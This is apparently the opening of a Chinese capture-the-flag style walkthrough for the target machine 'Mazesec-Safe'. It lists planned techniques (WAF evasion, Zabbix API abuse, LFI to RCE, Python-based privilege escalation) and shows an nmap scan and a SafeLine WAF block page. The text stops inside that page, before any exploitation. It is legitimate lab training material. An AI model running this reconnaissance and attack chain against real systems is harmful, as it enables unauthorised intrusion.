Mazesec-Safe

因为多有智慧，就多有愁烦。加增知识的，就加增忧伤。–《传道书》1:18

靶机ip：192.168.56.75

难度：困难

涉及内容：

Web 安全与 WAF 绕过：弱口令利用、Zabbix API 复杂利用链构建、基于 Payload 混淆的 WAF 规则规避、基于“服务启动时间差（Startup Gap）”的 WAF 物理绕过。
信息收集与内网渗透：Docker 容器环境枚举（CDK）、内网资产扫描（Fscan）、敏感日志信息泄露提取。
漏洞挖掘与利用：隐藏参数 Fuzzing（ffuf）、本地文件包含（LFI）读源码、PHP 伪协议（data://, php://filter）实现 RCE。
逆向分析与权限提升：C 语言 SUID Wrapper 逆向审计、基于 execl 函数调用的环境变量继承漏洞、Python 高级劫持提权（PYTHONINSPECT 强制交互、PYTHONPATH 模块劫持）。

端口扫描：

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.75 -sV -sC -T4 -A -O
Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-03 07:34 +0000
Nmap scan report for 192.168.56.75
Host is up (0.0055s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 10.0 (protocol 2.0)
80/tcp    open  http     Apache httpd 2.4.66 ((Unix))
|_http-title: MazeSec Corp - Internal Portal
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.66 (Unix)
82/tcp    open  xfer?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 466 
|     Date: Sun, 03 May 2026 07:35:01 GMT
|     Content-Type: text/html;charset=utf-8
|     Connection: close
|     Set-Cookie: sl-session=Z0WLayVM+GlBOv3lzEQmIA==; Path=/; Max-Age=86400; HttpOnly
|     <!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="icon" href="/.safeline/static/favicon.png" type="image/png"><title id="slg-title"></title><style>:root {--primary-color:#0067B8;--light-primary-color:#0067B8cc;--font-color:#fff;--light-font-color:#ffffff80;--success-color:#00b87c;--warning-color:#ff6666;--warning-font-color:#fff;--warning-light-font-color:#ffffff80;}</style><style>html{height:100%}body{height:100%;margin:0;font-family:PingFang SC,Helvetica Neue,Helvetica,Arial,sans-serif}#slg-bg{background-color:var(--primary-color);z-index:100;width:100%;height:100%;position:fixed;inset:0}#slg-box{z-index:300;border-r
|   HTTPOptions: 
|     HTTP/1.1 466 
|     Date: Sun, 03 May 2026 07:35:01 GMT
|     Content-Type: text/html;charset=utf-8
|     Connection: close
|     Set-Cookie: sl-session=aZg8ZCVM+Gm66riGJHe3mg==; Path=/; Max-Age=86400; HttpOnly
|_    <!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="icon" href="/.safeline/static/favicon.png" type="image/png"><title id="slg-title"></title><style>:root {--primary-color:#0067B8;--light-primary-color:#0067B8cc;--font-color:#fff;--light-font-color:#ffffff80;--success-color:#00b87c;--warning-color:#ff6666;--warning-font-color:#fff;--warning-light-font-color:#ffffff80;}</style><style>html{height:100%}body{height:100%;margin:0;font-family:PingFang SC,Helvetica Neue,Helvetica,Arial,sans-serif}#slg-bg{background-color:var(--primary-color);z-index:100;width:100%;height:100%;position:fixed;inset:0}#slg-box{z-index:300;border-r
8081/tcp  open  http     nginx 1.26.1
|_http-title: Zabbix docker: Zabbix
| http-robots.txt: 2 disallowed entries 
|_/ /zabbix/".
9443/tcp  open  ssl/http nginx
| tls-alpn: 
|   h2
|   http/1.1
|   http/1.0
|_  http/0.9
| ssl-cert: Subject: organizationName=Chaitin Co., Ltd./stateOrProvinceName=Beijing/countryName=CN
| Not valid before: 2023-12-04T14:36:41
|_Not valid after:  2123-11-10T14:36:41
|_http-trane-info: Problem with XML parsing of /evox/about
|_ssl-date: TLS randomness does not represent time
|_http-title: Site doesn't have a title (text/html).
65443/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, RPCCheck, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Date: Sun, 03 May 2026 07:35:06 GMT
|     Content-Type: text/html
|     Content-Length: 204
|     Connection: close
|     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|     <html>
|     <head><title>400 Bad Request</title></head>
|     <body>
|     <center><h1>400 Bad Request</h1></center>
|     <hr><center>tengine</center>
|     </body>
|     </html>
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sun, 03 May 2026 07:35:06 GMT
|     Content-Type: application/octet-stream
|     Content-Length: 0
|_    Connection: close
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port82-TCP:V=7.98%I=7%D=5/3%Time=69F6FAA7%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,39D1,"HTTP/1\.1\x20466\x20\r\nDate:\x20Sun,\x2003\x20May\x202026\
SF:x2007:35:01\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nConne
SF:ction:\x20close\r\nSet-Cookie:\x20sl-session=Z0WLayVM\+GlBOv3lzEQmIA==;
SF:\x20Path=/;\x20Max-Age=86400;\x20HttpOnly\r\n\r\n<!DOCTYPE\x20html><htm
SF:l><head><meta\x20charset=\"utf-8\"><meta\x20name=\"viewport\"\x20conten
SF:t=\"width=device-width,\x20initial-scale=1\.0\"><link\x20rel=\"icon\"\x
SF:20href=\"/\.safeline/static/favicon\.png\"\x20type=\"image/png\"><title
SF:\x20id=\"slg-title\"></title><style>:root\x20{--primary-color:#0067B8;-
SF:-light-primary-color:#0067B8cc;--font-color:#fff;--light-font-color:#ff
SF:ffff80;--success-color:#00b87c;--warning-color:#ff6666;--warning-font-c
SF:olor:#fff;--warning-light-font-color:#ffffff80;}</style><style>html{hei
SF:ght:100%}body{height:100%;margin:0;font-family:PingFang\x20SC,Helvetica
SF:\x20Neue,Helvetica,Arial,sans-serif}#slg-bg{background-color:var\(--pri
SF:mary-color\);z-index:100;width:100%;height:100%;position:fixed;inset:0}
SF:#slg-box{z-index:300;border-r")%r(HTTPOptions,39D1,"HTTP/1\.1\x20466\x2
SF:0\r\nDate:\x20Sun,\x2003\x20May\x202026\x2007:35:01\x20GMT\r\nContent-T
SF:ype:\x20text/html;charset=utf-8\r\nConnection:\x20close\r\nSet-Cookie:\
SF:x20sl-session=aZg8ZCVM\+Gm66riGJHe3mg==;\x20Path=/;\x20Max-Age=86400;\x
SF:20HttpOnly\r\n\r\n<!DOCTYPE\x20html><html><head><meta\x20charset=\"utf-
SF:8\"><meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20init
SF:ial-scale=1\.0\"><link\x20rel=\"icon\"\x20href=\"/\.safeline/static/fav
SF:icon\.png\"\x20type=\"image/png\"><title\x20id=\"slg-title\"></title><s
SF:tyle>:root\x20{--primary-color:#0067B8;--light-primary-color:#0067B8cc;
SF:--font-color:#fff;--light-font-color:#ffffff80;--success-color:#00b87c;
SF:--warning-color:#ff6666;--warning-font-color:#fff;--warning-light-font-
SF:color:#ffffff80;}</style><style>html{height:100%}body{height:100%;margi
SF:n:0;font-family:PingFang\x20SC,Helvetica\x20Neue,Helvetica,Arial,sans-s
SF:erif}#slg-bg{background-color:var\(--primary-color\);z-index:100;width:
SF:100%;height:100%;position:fixed;inset:0}#slg-box{z-index:300;border-r");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port65443-TCP:V=7.98%I=7%D=5/3%Time=69F6FAAB%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,86,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2003\x20May\x2020
SF:26\x2007:35:06\x20GMT\r\nContent-Type:\x20application/octet-stream\r\nC
SF:ontent-Length:\x200\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,86,
SF:"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2003\x20May\x202026\x2007:35:
SF:06\x20GMT\r\nContent-Type:\x20application/octet-stream\r\nContent-Lengt
SF:h:\x200\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,14E,"HTTP/1\.1\
SF:x20400\x20Bad\x20Request\r\nDate:\x20Sun,\x2003\x20May\x202026\x2007:35
SF::06\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\x20204\r\nC
SF:onnection:\x20close\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DT
SF:D\x20HTML\x202\.0//EN\">\r\n<html>\r\n<head><title>400\x20Bad\x20Reques
SF:t</title></head>\r\n<body>\r\n<center><h1>400\x20Bad\x20Request</h1></c
SF:enter>\r\n<hr><center>tengine</center>\r\n</body>\r\n</html>\r\n")%r(RP
SF:CCheck,14E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nDate:\x20Sun,\x2003\x
SF:20May\x202026\x2007:35:06\x20GMT\r\nContent-Type:\x20text/html\r\nConte
SF:nt-Length:\x20204\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20HTML\x20P
SF:UBLIC\x20\"-//IETF//DTD\x20HTML\x202\.0//EN\">\r\n<html>\r\n<head><titl
SF:e>400\x20Bad\x20Request</title></head>\r\n<body>\r\n<center><h1>400\x20
SF:Bad\x20Request</h1></center>\r\n<hr><center>tengine</center>\r\n</body>
SF:\r\n</html>\r\n")%r(DNSVersionBindReqTCP,14E,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nDate:\x20Sun,\x2003\x20May\x202026\x2007:35:06\x20GMT\r\nC
SF:ontent-Type:\x20text/html\r\nContent-Length:\x20204\r\nConnection:\x20c
SF:lose\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DTD\x20HTML\x202\
SF:.0//EN\">\r\n<html>\r\n<head><title>400\x20Bad\x20Request</title></head
SF:>\r\n<body>\r\n<center><h1>400\x20Bad\x20Request</h1></center>\r\n<hr><
SF:center>tengine</center>\r\n</body>\r\n</html>\r\n")%r(DNSStatusRequestT
SF:CP,14E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nDate:\x20Sun,\x2003\x20Ma
SF:y\x202026\x2007:35:06\x20GMT\r\nContent-Type:\x20text/html\r\nContent-L
SF:ength:\x20204\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLI
SF:C\x20\"-//IETF//DTD\x20HTML\x202\.0//EN\">\r\n<html>\r\n<head><title>40
SF:0\x20Bad\x20Request</title></head>\r\n<body>\r\n<center><h1>400\x20Bad\
SF:x20Request</h1></center>\r\n<hr><center>tengine</center>\r\n</body>\r\n
SF:</html>\r\n");
MAC Address: 08:00:27:C6:F6:00 (Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   5.49 ms 192.168.56.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.56 seconds

curl一下82，提示被雷池waf保护

1
2
3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.75:82 
<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="icon" href="/.safeline/static/favicon.png" type="image/png"><title id="slg-title"></title><style>:root {--primary-color:#0067B8;--light-primary-color:#0067B8cc;--font-color:#fff;--light-font-color:#ffffff80;--success-color:#00b87c;--warning-color:#ff6666;--warning-font-color:#fff;--warning-light-font-color:#ffffff80;}</style><style>html{height:100%}body{height:100%;margin:0;font-family:PingFang SC,Helvetica Neue,Helvetica,Arial,sans-serif}#slg-bg{background-color:var(--primary-color);z-index:100;width:100%;height:100%;position:fixed;inset:0}#slg-box{z-index:300;border-radius:.5rem;flex-direction:column;width:90%;max-width:40rem;height:15rem;padding:1rem 0;display:flex;position:fixed;top:50%;left:50%;transform:translate(-50%,-80%)}#slg-image{flex:3;align-items:center;width:100%;padding-top:1rem;display:flex}#slg-warning{margin-left:auto;margin-right:auto}#slg-caption{text-align:center;color:var(--font-color);flex:2}#slg-text{flex:1;font-size:1.5rem;line-height:4rem;display:inline}#slg-desc{color:var(--light-font-color);font-size:.8rem;line-height:2rem}#slg-copyright{text-align:center;z-index:2000;width:100%;height:10rem;font-size:1rem;position:absolute;bottom:0}#slg-more-info{color:var(--font-color);margin-bottom:1rem;font-size:.8rem;line-height:2rem}#slg-copyright a{color:var(--light-font-color);text-decoration:none}#slg-copyright a:hover,#slg-name{color:var(--font-color)}#slg-copyright-text{margin-top:1rem}</style><script>document.documentElement.style.setProperty("--primary-color","var(--warning-color)"),document.documentElement.style.setProperty("--font-color","var(--warning-font-color)"),document.documentElement.style.setProperty("--light-font-color","var(--warning-light-font-color)");</script><script>window.product_data = {"favicon":"data:image/png;base64,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","name":"雷池","name_en":"SafeLine","product":"长亭","community":"社区版","link":"https://waf-ce.chaitin.cn/","link_en":"https://waf.chaitin.com/","self":true};</script></head><body> <div id="slg-bg"></div> <div id="slg-box"> <div id="slg-image"> <svg id="slg-warning" width="68" height="59"><g fill="var(--font-color)"><g><path d="M29.455 2.852c2.062-3.527 6.151-4.07 8.48 0 1.538 2.527 7.818 13.159 14.15 23.904l.827 1.401.412.7.823 1.396A32540 32540 0 0 1 67.03 52.144l.02.038c.26.507 2.626 5.356-1.267 6.818H3.356s-6.846-1.44-.983-9.723c2.345-3.963 8.37-14.306 14.423-24.7l1.008-1.73c4.476-7.689 8.855-15.211 11.651-19.995m4.526 40.47c-2.157 0-3.905 1.74-3.905 3.885s1.748 3.884 3.905 3.884 3.905-1.739 3.905-3.884-1.748-3.884-3.905-3.884m.042-23.955c-2.18 0-3.947 1.758-3.947 3.926V35.69c0 2.168 1.767 3.926 3.947 3.926s3.947-1.757 3.947-3.926V23.293c0-2.168-1.767-3.926-3.947-3.926"/></g></g></svg> </div> <div id="slg-caption"> <div id="slg-text"></div> <div id="slg-desc"></div> </div> </div> <div id="slg-copyright"> <div id="slg-more-info"></div> <a id="slg-link"> <div id="slg-logo" style="display:none"> <svg width="32" height="35"><g fill="var(--font-color)"><path d="M15.006.33c.602-.44 1.4-.44 2.002 0 1.985 1.444 6.911 4.473 12.901 4.631.78.035 1.418.599 1.577 1.356.922 4.754 2.605 20.848-15.452 28.35C-2.077 27.183-.43 11.07.528 6.317c.142-.757.815-1.32 1.577-1.356 5.99-.158 10.863-3.187 12.9-4.63m1.037 4.54c-.28 1.647-2.15 1.938-2.15 1.938-1.9.309-2.819-1.12-2.819-1.12.82 2.255 2.198 